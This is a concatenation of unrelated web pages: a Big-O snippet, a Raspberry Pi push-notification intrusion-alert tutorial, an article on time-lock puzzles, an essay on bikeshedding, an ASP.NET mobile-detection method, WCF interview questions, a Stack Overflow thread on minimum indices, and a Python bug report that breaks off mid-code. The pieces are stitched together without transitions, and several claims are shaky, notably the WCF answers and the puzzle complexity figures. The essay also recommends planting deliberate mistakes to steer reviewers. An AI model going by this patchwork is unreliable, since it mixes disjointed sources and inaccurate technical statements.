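To make these rules concrete, here is a small sketch (in Python for brevity; the function names are my own) that counts the number of steps each loop shape actually performs:

```python
def linear_steps(n):
    # O(n): a single loop whose variable increases by a constant each pass
    steps = 0
    i = 0
    while i < n:
        steps += 1
        i += 1
    return steps

def log_steps(n):
    # O(log n): the loop variable is multiplied by a constant each pass
    steps = 0
    i = 1
    while i < n:
        steps += 1
        i *= 2
    return steps

print(linear_steps(1024))  # 1024 steps
print(log_steps(1024))     # 10 steps, since 2^10 = 1024
```

Doubling the input doubles the work of the linear loop but adds only one step to the logarithmic one, which is why an O(log n) algorithm comfortably fits even a 10^8-sized constraint.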
With this article at OpenGenus, you must have a good idea of how to make your Java code execute faster. Enjoy.
Pushetta: Send push notifications from Your Raspberry Pi
Web site:
Project Summary:
Use a Raspberry Pi to send push notification to Android and iOS smartphones. We present a simple intrusion detection system which send a push notification when someone enters in a room.
Full Project:
Some time ago, sending realtime notifications from an embedded system was a problem with few solutions; the most widespread one was SMS. This is an effective solution because knowing the phone number of the recipient is all you need to send them a few words. On the other hand, there are some issues with SMS:
- You must pay to send messages
- You need to know in advance all the recipients’ numbers
- You can send a limited number of characters
- You can’t get information about read messages
Today there are more options for solving the task, and the one I like most is push notifications. Every major mobile operating system implements some system to handle push notifications; Apple was the first to introduce them, and in a short time all the other OSes did too.
Pushetta, push notifications from the cloud
What I would like to present here is Pushetta, a system made to make using push notifications trivial, and to demonstrate it I made a simple example using a Raspberry Pi.
First of all you need to register on the Pushetta web site; it's free and it's a mandatory step to be able to send notifications.
Once registered, it's time to log in and create your first channel. A channel is something like a topic where your notifications are sent. Users who want to receive notifications have to subscribe to the channels they are interested in.
Creating a channel requires a few pieces of data: an image to identify it, a name, and a short description are the essential ones. A channel can be public or private; at this time only public channels are available, and the hidden flag makes a channel invisible to search.
After a channel is created we are ready to start pushing notifications, and now it's time to use our Raspberry Pi. Pushing notifications with Pushetta can be done in many ways: using curl from the command line, or from any major language. We'll use Python in our project.
Send a notification when someone is in the room
We'll use the Raspberry Pi as an intrusion detection system; our objective is to push a notification when someone enters the room. First we need to prepare the SD card. I use Raspbian in this project (it can be downloaded from here, and here there are instructions to install it).
With Raspbian installed, it's time to make a simple circuit to detect when someone enters the room. I use a PIR (Passive InfraRed) sensor; this kind of sensor uses infrared light to detect temperature changes in a specific range (check here for a detailed explanation). Given that the human body is warmer than the surrounding environment, it can detect when someone moves around.
These sensors are really simple to interface with: all we need is to give the sensor power and check its OUT pin from a Raspberry Pi GPIO. When the OUT pin goes high (+3.3V), something is in range.
I made this simple circuit using the Raspberry Pi model B, but it can easily be adapted for other models. Now we can start writing our first lines of code to read the PIR status. I'll use a very useful Python module that makes it trivial to use the GPIO on a Raspberry Pi; this module is called RPi.GPIO. First of all we need to connect to the Raspberry Pi via ssh and download the module.
$ wget
$ tar xvzf RPi.GPIO-0.5.8.tar.gz
$ cd RPi.GPIO-0.5.8/
$ sudo python setup.py install
If You get an error like “Python.h: No such file or directory” You need to install Python dev packages with:
$ sudo apt-get install python-dev
Now we are ready to write the Python code. It is very important to use a pinout reference when writing the code; a really good one is here.
import RPi.GPIO as GPIO
import time

GPIO.setmode(GPIO.BCM)

# In BCM mode pin 7 is identified by id 4
PIR_PIN = 4
GPIO.setup(PIR_PIN, GPIO.IN)

try:
    print "Reading PIR status"
    while True:
        if GPIO.input(PIR_PIN):
            print "Motion detected!"
except KeyboardInterrupt:
    print "Exit"
    GPIO.cleanup()
By default GPIOs are accessible only to admin users, so launch the script with sudo (something like "sudo python test_pir.py").
Now, if all works as expected, we'll see "Motion detected!" in the console every time the PIR detects movement, and the next step is to push a notification in this condition. Looking at Pushetta's doc page, there is a Python sample with everything we need. I used a polling approach, that is, checking the status of the OUT pin continuously in an infinite loop. This isn't the best approach (a better one uses interrupts, but that is more complex) and I prefer to stay focused on our target.
First we need to import some modules in our script.
import urllib2
import json
And define the function to send the notification.
def sendNotification(token, channel, message):
    data = {
        "body": message,
        "message_type": "text/plain"
    }
    req = urllib2.Request('{0}/'.format(channel))
    req.add_header('Content-Type', 'application/json')
    req.add_header('Authorization', 'Token {0}'.format(token))
    response = urllib2.urlopen(req, json.dumps(data))
Now it's only a matter of combining everything and you're done; the full working example can be downloaded from here.
Software & Code Snippets:
import urllib2
import json
import RPi.GPIO as GPIO
import time

def sendNotification(token, channel, message):
    data = {
        "body": message,
        "message_type": "text/plain"
    }
    req = urllib2.Request('{0}/'.format(channel))
    req.add_header('Content-Type', 'application/json')
    req.add_header('Authorization', 'Token {0}'.format(token))
    response = urllib2.urlopen(req, json.dumps(data))

GPIO.setmode(GPIO.BCM)

# In BCM mode pin 7 is identified by id 4
PIR_PIN = 4
GPIO.setup(PIR_PIN, GPIO.IN)

try:
    print "Reading PIR status"
    while True:
        if GPIO.input(PIR_PIN):
            sendNotification("4b6e163b7935271b924dbf2fdc7b4b528bd6c6db", "Sample Channel", "Motion detected")
            print "Motion detected!"
except KeyboardInterrupt:
    print "Exit"
    GPIO.cleanup()
Time Locked Puzzles and Proof of Work
So how might we lock down a file for a given amount of time, or make sure that someone does not get their present until their birthday? Well, one way is to get others to do some work that we know will take a certain amount of time. If I know it will take you one hour to cut the grass in your garden before I give you your reward, I can hope you will not be able to do it quicker than one hour.
Hashing
This method is defined here.
One method is to get the receiver to perform some work to find the encryption key. For example, if we wanted to lock a message down for one hour, we could take a seed value and then continually hash it for the amount of time that we think the recipient would require to generate the same key. The recipient can then generate the same key, as long as the sender and recipient share the number of hash iterations used. We then tell the receiver the seed value and the number of iterations they must use to compute the key, along with the encrypted message. The receiver must then compute the key, proving their work.
The method, though, is not perfect as the cost of the operation will vary with the clock speed of the processor. We will not be able to compute in parallel as the hashing operations must be done one at a time. The other side will still have a cost in the computation. The following is a sample run for a time to compute the key of 0.25 seconds:
Message: The quick brown fox
Keyseed: 12345
Encryption key: 6CUlrN1BZPz9ytTrKHDGsbLEj20a15stop5S_0ktCMk=
Encrypted value: gAAAAABbCdAfteG9dAUdmQgqHoY4hby9moK51-qYTRlYXpO7Ghbev6GqDFsadulgmZvgHVUv6mRwE9SRcbF2-UVnDW_KzJs7GHX9ffcZ-btIH-pKP5ubOSE=
Decryption key: 6CUlrN1BZPz9ytTrKHDGsbLEj20a15stop5S_0ktCMk=
Decrypted value: The quick brown fox
Key time (secs): 0.25
Iterations: 76109
Time to encrypt: 0.724999904633
Time to decrypt: 0.219000101089
And here is some sample code. We use SHA-256 to hash the seed.
import datetime
import time
import hashlib
import base64
from cryptography.fernet import Fernet
import sys

message = "hello"
keyseed = "12345"
timeout = 0.5

def generate_by_time(seed, delta):
    end = time.time() + delta.total_seconds()
    h = hashlib.sha256(seed).digest()
    iters = 0
    while time.time() < end:
        h = hashlib.sha256(h).digest()
        iters += 1
    return base64.urlsafe_b64encode(h), iters

def generate_by_iters(seed, iters):
    h = hashlib.sha256(seed).digest()
    for x in xrange(iters):
        h = hashlib.sha256(h).digest()
    return base64.urlsafe_b64encode(h)

def encrypt(keyseed, delta, message):
    key, iterations = generate_by_time(keyseed, delta)
    encrypted = Fernet(key).encrypt(message)
    return iterations, encrypted, key

def decrypt(keyseed, iterations, encrypted):
    key = generate_by_iters(keyseed, iterations)
    decrypted = Fernet(key).decrypt(encrypted)
    return decrypted, key

print "Message:\t", message
print "Keyseed:\t", keyseed

delta = datetime.timedelta(seconds=timeout)

t1 = time.time()
iters, encrypted, key = encrypt(keyseed, delta, message)
print "\nEncryption key:\t\t", key
print "Encrypted value:\t", encrypted

t2 = time.time()
decrypted, key = decrypt(keyseed, iters, encrypted)
t3 = time.time()

print "\nDecryption key:\t\t", key
print "Decrypted value:\t", decrypted

print "\nKey time (secs):\t", timeout
print "Iterations:\t\t", iters

print "\nTime to encrypt:", t2 - t1
print "Time to decrypt:", t3 - t2
In an extension to this, we could just publish the hashed value and let the receiver work out the number of times the seed value needs to be hashed to get the same value. In this case, the receiver searches for a hashed version of the key.
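A minimal sketch of this variant, written in Python 3 (unlike the Python 2 listings in this article), with function names of my own choosing: the sender publishes only the seed and the final digest, and the receiver must grind through the hash chain until the digest matches.

```python
import hashlib

def chain(seed, iters):
    # sender: h0 = H(seed), then hash the digest iters more times
    h = hashlib.sha256(seed).digest()
    for _ in range(iters):
        h = hashlib.sha256(h).digest()
    return h

def recover_iterations(seed, target, limit=10**7):
    # receiver's work: rehash until the published target digest appears
    h = hashlib.sha256(seed).digest()
    for i in range(limit):
        if h == target:
            return i
        h = hashlib.sha256(h).digest()
    return None

target = chain(b"12345", 5000)               # published alongside the ciphertext
print(recover_iterations(b"12345", target))  # receiver recovers 5000
```

Because each hash depends on the previous one, the receiver's search cannot be parallelised, which is exactly the property the time lock relies on.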
Squaring
This method is defined here.
Ron Rivest [paper] defined a puzzle which is fairly easy to compute [O(log n)] and more difficult to solve [O(n^2)]. For this we create a random value (a) and then raise it to the power of 2^t, where t is the difficulty level.
The method, as outlined by Rivest [paper] defines the usage of a squaring process which increases the work to compute the key.
Now let’s say that Bob wants to make sure that Alice cannot open a message within a given amount of time. Initially Bob starts with two prime numbers (p) and (q) and determines (n):
n=p×q
We can also calculate PHI as:
PHI=(p−1)×(q−1)
Next we create an encryption key (K) and with a message (M) we encrypt:
Cm=Encrypt(K,M)
Next we select a random value (a) and a difficulty level (t), and compute a value of b which is added to the key (K):
CK = K + a^(2^t) (mod n)
Bob will then send {n,a,t,CK,Cm} to Alice, and get her to prove her work in order to decrypt the cipher message (Cm).
Alice then takes the values and computes the key with:
Key = CK − a^(2^t) (mod n)
and which will have a workload dependent on the difficulty (t).
Bob, though, does not have the same workload as Alice, as he knows some of the original values. He uses PHI to reduce the complexity:
ϵ=2^t (mod PHI)
And then the calculation of the value to find becomes:
b = a^ϵ (mod n)
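This shortcut rests on Euler's theorem: when gcd(a, n) = 1, the exponent can be reduced modulo PHI. A quick check with toy primes (p = 5, q = 11; the values are chosen only for illustration):

```python
# toy parameters: p = 5, q = 11
n = 5 * 11                 # 55
phi = (5 - 1) * (11 - 1)   # 40
a, t = 7, 10               # gcd(a, n) must be 1 for the reduction to hold

# Alice's value (the real puzzle forces t sequential squarings;
# here we compute it directly for brevity)
slow = pow(a, 2 ** t, n)

# Bob's shortcut: reduce the exponent mod phi first
eps = pow(2, t, phi)
fast = pow(a, eps, n)

print(slow, fast)  # both print the same residue
```

With real 1024-bit primes, Bob's reduced exponent stays small while Alice's 2^t grows with the difficulty level, which is what makes the puzzle cheap to set and expensive to solve.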
Message: The quick brown fox
Keyseed: 12345
Key: WZRHGrsBESr8wYFZ9sx0tPURuZgG2lmzyvWpwXPKz8U=
Keyval: 40517827634140982427891826463487354397562163067645485726320510288945209855941
Bob sends this as the puzzle
N: 5808519655638548297258092061418259166774543092617038796300914729783059570485346403807454618287525932811499665099257674691573742312634492877501558241926510855265445655865943438821912402793071410193718769033138895292899984621735782974450454023113374373918673037042253066818942089671557106505473585751547903422068492120948273678721315120463641764405010804880764577517991306650182004053654755677171480098164870018127440284136797039199208818583865459976018367716791615092378912189828151394009348523859513336870704003245896134059043428841497988022873465729540129905401323861892790008954081042521197986890397363455472811639
a: 101
t: 1
CK: 40517827634140982427891826463487354397562163067645485726320510288945209866142
Encrypted: gAAAAABbCrlEUvLDQQX6gIiGqA81TTHzm5rD4Y6c4I5X5-qnkhGzqC8lOojkzmmy4cIJ3WXIn9aKO_5P3VY21ScNDf0wtOsTXo93-GbmwF6-_hBtyInh6g8=
Alice receives and now computes
Key guess = 40517827634140982427891826463487354397562163067645485726320510288945209855941
Decrypted: The quick brown fox
As an example, using a 3.5GHz Xeon processor, we get the following timings for the work Alice must do (with a=999):
t=8 0.000999927520752 seconds
t=16 0.208999872208 seconds
t=18 2.0 seconds
t=20 26.7730000019 seconds
And here is some sample code where we use SHA-256 to hash the seed:
import datetime
import time
import hashlib
import base64
from cryptography.fernet import Fernet
import sys
from base64 import b64decode
import struct
import random

message="hello"
keyseed = "12345"
a = random.randint(99999,999999)
t = 8

def tost(i):
    result = []
    while i:
        result.append(chr(i&0xFF))
        i >>= 8
    result.reverse()
    return ''.join(result)

print "Message:\t",message
print "Keyseed:\t",keyseed

p=75184456329323393981453160999168869619896388565246270326667621020749883434526629149123313289822093813309128973674541785507146180116583118006552309466590981238828120901809218798591532127897713278598850326780359769279464340716666681725354754726329143696440538687112219849324721464631600820710676683650403820541
q=77256921699294288099751913986725879141470275753142260831695319390868938092522018978912165340760059157501314281329434440243543281733706145540078343592028736575027896004544593182243130855408638162095082271337507750610446164552740816661833414846974163466111988532153163988528271485739448606877973413411116622979
n = p*q
PHI = (p-1)*(q-1)

h = hashlib.sha256(keyseed).digest()
key=base64.urlsafe_b64encode(h)
encrypted = Fernet(key).encrypt(message)
print "Key:",key
keyval = int(b64decode(key).encode('hex'), 16)
print "Keyval:",keyval

CK = ((keyval) + a**(2**t)) % n

print "\n\nBob sends this as the puzzle"
print "N:\t",n
print "a:\t",a
print "t:\t",t
print "CK:\t",CK
print "Encrypted:\t",encrypted

print "\n\nAlice receives and now computes"
t1 = time.time()
Key = (CK - a**(2**t)) % n
t2 = time.time()
val = tost(Key)
Keyguess = base64.urlsafe_b64encode(val)
print "\nKey guess (int):",Key
print "Key guess:",Keyguess
decrypted = Fernet(Keyguess).decrypt(encrypted)
print "Decrypted:",decrypted
print "Time for Alice to compute:",t2-t1

#print "\n\n--------Bob's calculation---------------------"
#t1 = time.time()
#eps = (2**t) % PHI
#b =(a**eps) % n
#t2 = time.time()
#print "Bob\'s value", b
#print "Time for Bob to compute:",t2-t1
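The commented-out section above is Bob's shortcut: because he knows PHI = phi(n), he can reduce the exponent 2**t modulo phi(n) and compute a**(2**t) mod n with a single fast modular exponentiation, while Alice must do t sequential squarings. Here is a minimal Python 3 sketch of that asymmetry; the parameters are toy values chosen only for illustration (a real puzzle uses large random primes and a much larger t):

```python
# Toy parameters for illustration only -- a real time-lock puzzle uses
# large random primes and a t chosen so the squarings take real time.
p, q = 1000003, 1000033          # small primes standing in for the real p, q
n, phi = p * q, (p - 1) * (q - 1)
a, t = 999, 64

# Alice (no trapdoor): t sequential modular squarings, inherently serial.
x = a % n
for _ in range(t):
    x = (x * x) % n
alice = x                        # a**(2**t) mod n, the slow way

# Bob (knows phi(n)): reduce the exponent first, then one fast pow().
e = pow(2, t, phi)
bob = pow(a, e, n)

print(alice == bob)
```

The equality holds by Euler's theorem as long as a is coprime to n, which is why knowing the factorization of n is exactly the trapdoor that makes Bob's side cheap.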
Conclusions
Proof of work is one way to define a cost limit to those who might want to change something on a system. But, remember, work can be costly.
Bike Sheds, Ducks, and Nuclear Reactors
The other day, I learned a new term, and it was great. I enjoyed this so much because it was a term for a concept I was familiar with but for which I had never had a word. I haven’t been this satisfied with a new word since “taking pleasure in seeing bad things happen to your enemies” was replaced with “schadenfreude.” I was listening to an episode of the Herding Code podcast from this past summer, and Nik Molnar described something called “bike shedding.”
This colloquialism is derived from an argument made by a man named C. Northcote Parkinson and later called “Parkinson’s Law of Triviality” that more debate within organizations surrounds trivial issues than extremely important ones.
Parkinson’s Law, Explained
Here’s a quick recap of his argument. He discusses a fictional committee with three items on its agenda: approving an atomic reactor, approving a bike shed, and approving a year’s supply of refreshments for committee meetings. The reactor is approved with almost no discussion since it is so staggeringly complicated and expensive that no one can really wrap their heads around it. A lot more arguing will be done about the bike shed, since committee members are substantially more likely to understand the particulars of construction, the cost of materials, etc. The most arguing, however, will be reserved for the subject of which drinks to have at the next meeting, since everyone understands and has an opinion about that.
This is human nature as I’ve experienced it, almost without exception. I can’t tell you how many preposterous meeting discussions have shaved precious hours off of my life while people argue about the most ridiculous things. One of the most common that comes to mind is people who are about to drive somewhere 20 minutes away spending 5-10 minutes arguing about which streets to take en route.
Introducing a Duck
In the life of a programmer, this phenomenon often has special and specific significance. On the Wikipedia page I linked, I also noticed a reference to a fun Jeff Atwood post about awesome programming terms that had been coined by respondents to an old Stack Overflow question. Take a look at number five: a “duck.”
Ducks, Applied
When I saw this, I actually guffawed at my desk. I didn’t do that just because I found this funny — I have actually employed this strategy in the past, and I see that I am not alone in my rank cynicism in a world of Parkinson’s Law of Triviality. It definitely seems that project management types, particularly ones that were never technical (or at least never any good at it), feel a great need to seize upon something that they can understand and offer an opinion on that thing in the form of an edict in order basically to assert some kind of dominance.
So, early in my career, when proposing technical plans I developed a habit of dropping a few red herring mistakes into the mix to make sure that obligatory posturing was dispensed with and any remaining criticisms were legitimate — I’d purposely do something like throw in a “we’re not going to be doing any documentation because of a lack of time” to which I would receive the admonition, “documentation is important, so add it in.” “Okie-dokie. Moving on.”
Bike Shedding in the Developer World
It isn’t just pointy-haired fire-hydrant peeing that exposes us to this phenomenon, however. We, as developers, are some of the worst offenders. The Wikipedia article also offers up something called “Wadler’s Law,” which appears to be a corollary to Parkinson’s in that it talks about developers being more likely to argue over language syntax than semantics.
In other words, you’ll get furious arguments over whether to use underscores between words in function names, but often hear crickets when you ask if the function is part of a consistent broader abstraction. My experience aligns with this as well. I can think of so, so many depressing code reviews that were all about “that method doesn’t have a doc comment” or “why are you using var” or “alphabetize your includes.” I’d offer up things like “let’s look at how cohesive the types are in this namespace,” and, again, crickets.
The great thing about opinions is that they’re an endlessly renewable, free resource. You can have as many as you like about anything you like, and no one can tell you not to (at least in societies that aren’t barbarically oppressive).
But what isn’t endless is people’s interest in your opinions. If you’re the person that’s offering one up intensely and about every subject as the conversation drifts from code to personal finances to football to craft beers, you’re devaluing your own currency. As you discuss and debate, be mindful of the stakes at play and be sparing when it comes to how many times you sit at the penny slots. After all, you don’t want to be the one remembered for furiously debating camel case and coffee flavors while rubber stamping the plans for Chernobyl.
Hm, I assumed pretty much everyone who knows “yak shaving” knows “bikeshedding”. Maybe that’s false and I’ve been lucky (?) to be exposed to enough bikeshedding to have learned the name long ago. Also, here’s bikeshedding in a tweetshell.
That tweet captures it perfectly. I’ve been in so many code reviews that followed that exact pattern.
I first came across the concept of a ‘duck’ under the name ‘neck-bolt’ (ie. a pointless, out-of-place, and obviously tacked-on element in a website design) coined by David Siegel in ‘Secrets of Successful Websites’. Siegel cautioned that no matter how hideous and out-of-place the design element, there was always a chance the client would fall in love with it and resist its later removal. I have had that happen to me a couple of times. Of course, these days we can try falling back on A/B user testing: “The version without the flaming and spinning ‘buy now’ graphic converts 11.5%… Read more »
That’s a good point. A gambit wherein you introduce some false flag change to be corrected out can backfire with the change being applauded, to your horror.
Detecting request from mobile device
Take control over what is and what is not mobile device for your web app
Microsoft made it easy to detect whether a request to your web application is coming from a mobile device by adding a property to the Request class: Request.Browser.IsMobileDevice.
This works fine for most mobile devices, but the property relies on a list of mobile browsers configured in the .NET Framework itself.
Nowadays, with the mobile device industry growing quickly, this approach can misidentify devices for a simple reason: the .NET Framework configuration does not update automatically when a new mobile platform is released.
You can always update the browser definition files, but that requires full access to your server machine, so it will not work if you are using a shared host.
Browser definition files are stored in folder C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\Browsers
What you can do is extend the Request class with another method which checks the UserAgent value. The user-agent keywords for mobile browsers can be stored in web.config as a comma-separated value.
<appSettings>
  <add key="mobileBrowsers" value="Blackberry,BB10,iPad,iPhone,Windows Phone,Windows CE"/>
</appSettings>
Create extension method for Request which compares this list of values with request user agent name.
public static bool IsMobile(this HttpRequest request)
{
    foreach (string mobileBrowser in System.Web.Configuration.WebConfigurationManager.AppSettings["mobileBrowsers"].Split(','))
    {
        if (request.UserAgent.ToLower().Contains(mobileBrowser.Trim().ToLower()))
        {
            return true;
        }
    }
    return false;
}
After including the namespace in which this extension is declared, you can easily check whether the page is accessed from a mobile device with Request.IsMobile().
If a new device or platform appears with a specific signature keyword, you can simply add it to the list to enable your website to recognize it.
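The check itself is just case-insensitive substring matching of the User-Agent against a configured keyword list, so it is easy to sketch outside of ASP.NET as well. Here is a rough Python equivalent; the keyword list mirrors the web.config value above, and the function name is purely illustrative:

```python
# Hypothetical Python port of the C# extension method above: return True
# if the request's User-Agent contains any configured mobile keyword.
MOBILE_BROWSERS = ["Blackberry", "BB10", "iPad", "iPhone",
                   "Windows Phone", "Windows CE"]

def is_mobile(user_agent: str) -> bool:
    ua = user_agent.lower()
    # Same logic as the C# version: trim each keyword, lowercase both
    # sides, and test for containment.
    return any(keyword.strip().lower() in ua for keyword in MOBILE_BROWSERS)

print(is_mobile("Mozilla/5.0 (iPhone; CPU iPhone OS 13_2 like Mac OS X)"))  # True
print(is_mobile("Mozilla/5.0 (Windows NT 10.0; Win64; x64)"))               # False
```

As in the C# version, keeping the keywords in configuration rather than code is what makes the list easy to extend when a new platform ships.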
Disclaimer
Purpose of the code contained in snippets or available for download in this article is solely for learning and demo purposes. Author will not be held responsible for any failure or damages caused due to any other usage.
Introduction to WCF Interview Questions and Answers
WCF stands for Windows Communication Foundation. It is a framework used for building service-oriented applications. With the help of Windows Communication Foundation, you can send asynchronous messages from one endpoint to another. Services created with WCF can be accessed over different protocols, for example HTTP, TCP, and MSMQ.
Now, if you are looking for a job that is related to WCF, you need to prepare for the 2020 WCF interview questions. It is true that every interview is different, depending on the job profile. Here, we have prepared the important WCF interview questions and answers which will help you succeed in your interview.
In this 2020 WCF Interview Questions article, we present the 21 most important and frequently asked interview questions. These questions will help students build their concepts around WCF and help them crack the interview. The questions are divided into two parts as follows:
Part 1 – WCF Interview Questions (Basic)
This first part covers basic Interview Questions and Answers.
Q1. What do you mean by WCF?
Answer:
WCF (Windows Communication Foundation) is a framework that is used to build service-oriented applications.
Q2. Explain the fundamentals of WCF
Answer:
The fundamentals of WCF are given below:
- Unification – (COM+ Services, Web Services, .NET Remoting, Microsoft Message Queuing)
- Interoperability
- Service Orientation
Q3. What is the need for WCF?
Answer:
This is a basic WCF interview question asked in an interview. We need WCF because a service created using WCF can be consumed over different protocols.
Q4. What are the Features of WCF?
Answer:
Service Orientation, Interoperability, Service Metadata, Data Contracts, Security, Transactions, AJAX and REST Support, Extensibility.
Q5. Describe the advantages of WCF.
Answer:
Service-Oriented, location Independent, Language-Independent, Platform Independent, Support Multiple Operations, It supports all kinds of protocol.
Q6. What is the difference between WCF and Web Services?
Answer:
WCF is a framework which is used to build service-oriented applications, while web services are application logic accessed over web protocols. Web services are hosted in IIS, while a WCF service can be hosted in IIS or self-hosted.
Q7. Explain about SOA?
Answer:
It stands for Service-Oriented Architecture; it is an architectural approach to software development.
Q8. What do you mean by service contract in WCF?
Answer:
A service contract specifies the operations a service exposes to its clients; it binds the needs of the customers to the mechanics of the service.
Q9. What are the components of the WCF application?
Answer:
WCF application consists of 3 components:
- WCF Service
- WCF Service Host
- WCF service client
Q10. What are the isolation levels provided in WCF?
Answer:
Isolation levels provided in WCF are given below:
- Read Uncommitted.
- Read Committed.
- Repeatable Read.
Part 2 – WCF Interview Questions (Advanced)
Let us now have a look at the advanced Interview Questions.
Q11. What is the various address format of WCF?
Answer:
Address format of WCF are given below:
- HTTP format
- TCP format
- MSMQ format
Q12. What do you mean by Data Contract Serializer?
Answer:
This is a frequently asked WCF interview question. Converting an object instance into a portable, transmittable format is known as serialization; in WCF, the DataContractSerializer is the default serializer used for this.
Q13. Describe the binding in WCF?
Answer:
The binding in WCF are listed below:
- Basic HTTP Binding
- NetTcp Binding
- WSHttp Binding
- NetMsmq Binding
Q14. What is the namespace name used for WCF service?
Answer:
The System.ServiceModel namespace is used for WCF services.
Q15. What are the MEPs of WCF?
Answer:
The MEPs of WCF are given below:
- DataGram
- Request and Response
- Duplex
Q16. What kind of transaction manager is supported by WCF?
Answer:
They are as follows:
- Lightweight
- WS- Atomic Transaction
- OLE
Q17. What are the different Data contracts in WCF?
Answer:
Different Data contracts in WCF are given below:
- Data Contract
- Data Member
Q18. What are the different instance modes of WCF?
Answer:
Different instance modes of WCF are given below:
- Per Call
- Per Session
- Single
Let us move to the next WCF Interview Questions
Q19. What are the different ways of Hosting Webservices?
Answer:
The WCF service can be hosted in the following ways:
- IIS
- Self Hosting
- WAS (Windows Activation Service)
Q20. What are the different transport schemas supported by WCF?
Answer:
The transported schemas are given below:
- HTTP
- TCP
- Peer network
- IPC
- MSMQ
Q21. Explain the different types of contracts defined in WCF.
Answer:
There are four contracts:
- Service Contracts
- Data Contracts
- Fault Contracts
- Message Contracts
Conclusion:
These questions are very important for WCF (Windows Communication Foundation), but you should also get hands-on practice. From a career point of view, it is a new and advanced technology, and resources for it are not widely available.
Recommended Articles
This has been a guide to the list of WCF Interview Questions and Answers so that the candidate can crack these interview questions easily. You may also look at the following articles to learn more –
How do I find the Index of the smallest number in an array in python if I have multiple smallest numbers and want both indexes?
I have an array in which I want to find the index of the smallest elements. I have tried the following method:
distance = [2,3,2,5,4,7,6]
a = distance.index(min(distance))
This returns 0, which is the index of the first smallest distance. However, I want to find all such instances, 0 and 2. How can I do this in Python?
You may enumerate array elements and extract their indexes if the condition holds:
min_value = min(distance)
[i for i,n in enumerate(distance) if n==min_value]
#[0,2]
Use np.where to get all the indexes that match a given value:
import numpy as np

distance = np.array([2,3,2,5,4,7,6])
np.where(distance == np.min(distance))[0]
Out[1]: array([0, 2])
Numpy outperforms other methods as the size of the array grows:
Results of TimeIt comparison test, adapted from Yannic Hamann's code below

                     Length of Array x 7
Method               1       10      20      50      100     1000
Sorted Enumerate     2.47    16.291  33.643
List Comprehension   1.058   4.745   8.843   24.792
Numpy                5.212   5.562   5.931   6.22    6.441   6.055
Defaultdict          2.376   9.061   16.116  39.299
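As an equivalent spelling worth knowing (not in the answer above): for a 1-D array, np.flatnonzero(condition) returns exactly what np.where(condition)[0] does, a little more directly:

```python
import numpy as np

distance = np.array([2, 3, 2, 5, 4, 7, 6])
# flatnonzero returns the (flattened) indices where the condition holds,
# which for a 1-D array is the same as np.where(condition)[0].
idx = np.flatnonzero(distance == distance.min())
print(idx)  # [0 2]
```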
Surprisingly the numpy answer seems to be the slowest.
Update: Depends on the size of the input list.
import numpy as np
import timeit
from collections import defaultdict

def weird_function_so_bad_to_read(distance):
    se = sorted(enumerate(distance), key=lambda x: x[1])
    smallest_numb = se[0][1]  # careful exceptions when list is empty
    return [x for x in se if smallest_numb == x[1]]
    # t1 = 1.8322973089525476

def pythonic_way(distance):
    min_value = min(distance)
    return [i for i, n in enumerate(distance) if n == min_value]
    # t2 = 0.8458914929069579

def fastest_dont_even_have_to_measure(np_distance):
    # np_distance = np.array([2, 3, 2, 5, 4, 7, 6])
    min_v = np.min(np_distance)
    return np.where(np_distance == min_v)[0]
    # t3 = 4.247801031917334

def dd_answer_was_my_first_guess_too(distance):
    d = defaultdict(list)  # a dictionary where every value is a list by default
    for idx, num in enumerate(distance):
        d[num].append(idx)  # for each number append the value of the index
    return d.get(min(distance))
    # t4 = 1.8876687170704827

def wrapper(func, *args, **kwargs):
    def wrapped():
        return func(*args, **kwargs)
    return wrapped

distance = [2, 3, 2, 5, 4, 7, 6]
t1 = wrapper(weird_function_so_bad_to_read, distance)
t2 = wrapper(pythonic_way, distance)
t3 = wrapper(fastest_dont_even_have_to_measure, np.array(distance))
t4 = wrapper(dd_answer_was_my_first_guess_too, distance)

print(timeit.timeit(t1))
print(timeit.timeit(t2))
print(timeit.timeit(t3))
print(timeit.timeit(t4))
We can use an interim dict to store indices of the list and then just fetch the minimum value of distance from it. We will also use a simple for-loop here so that you can understand what is happening step by step.
from collections import defaultdict

d = defaultdict(list)  # a dictionary where every value is a list by default
for idx, num in enumerate(distance):
    d[num].append(idx)  # for each number append the value of the index
d.get(min(distance))   # fetch the indices of the min number from our dict
[0, 2]
You can also do the following
list comprehension
distance = [2,3,2,5,4,7,6]
min_distance = min(distance)
[index for index, val in enumerate(distance) if val == min_distance]
>>> [0, 2]
- get the smallest number, and then linearly iterate, get all the indexes for that number.
- Why would you calculate the minimum for every iteration?
- @YannicHamann Nothing surprising at all. I ran these tests before posting my answer. NumPy is not a silver bullet.
- Interesting. I would not have expected that. I wonder why that is the case?
- when you compare distance of the type numpy.ndarray with an integer it always evaluates the FULL array.
- I think this brings up an important point: numpy shines in efficient computation with very large arrays. For small arrays, numpy may not be the most efficient, as you have clearly pointed out. But numpy is much more scalable than most other methods. This discussion contains some relevant explanation.
- No problem. I made the plot above in Excel, because it was quick.
- I re-made the plot using Matplotlib.
- I ran some additional tests using your code which show how numpy performs well even as the array size increases dramatically.
- How is this different from my previously posted answer?
- @DYZ I think we both posted the answer at the same time. Or do you have any reason to suggest that my answer came from your? What if I turned around and asked you the same question?
- Calculating the minimum for every iteration seems wasteful in both of your answers.
Created on 2008-08-09 02:26 by daishiharada, last changed 2020-01-12 20:44 by miss-islington. This issue is now closed.
I am testing python 2.6 from SVN version: 40110
I tried the following, based on the documentation
and example in the ast module. I would expect the
second 'compile' to succeed also, instead of
throwing an exception.
Python 2.6b2+ (unknown, Aug 6 2008, 18:05:08)
[GCC 4.2.3 (Ubuntu 4.2.3-2ubuntu7)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import ast
>>> a = ast.parse('foo', mode='eval')
>>> x = compile(a, '<unknown>', mode='eval')
>>> class RewriteName(ast.NodeTransformer):
... def visit_Name(self, node):
... return ast.copy_location(ast.Subscript(
... value=ast.Name(id='data', ctx=ast.Load()),
... slice=ast.Index(value=ast.Str(s=node.id)),
... ctx=node.ctx
... ), node)
...
>>> a2 = RewriteName().visit(a)
>>> x2 = compile(a2, '<unknown>', mode='eval')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: required field "lineno" missing from expr
>>>
This is actually not a bug. copy_location does not work recursively.
For this example it's more useful to use the "fix_missing_locations"
function which traverses the tree and copies the locations from the
parent node to the child nodes:
import ast

a = ast.parse('foo', mode='eval')
x = compile(a, '<unknown>', mode='eval')

class RewriteName(ast.NodeTransformer):
    def visit_Name(self, node):
        return ast.Subscript(
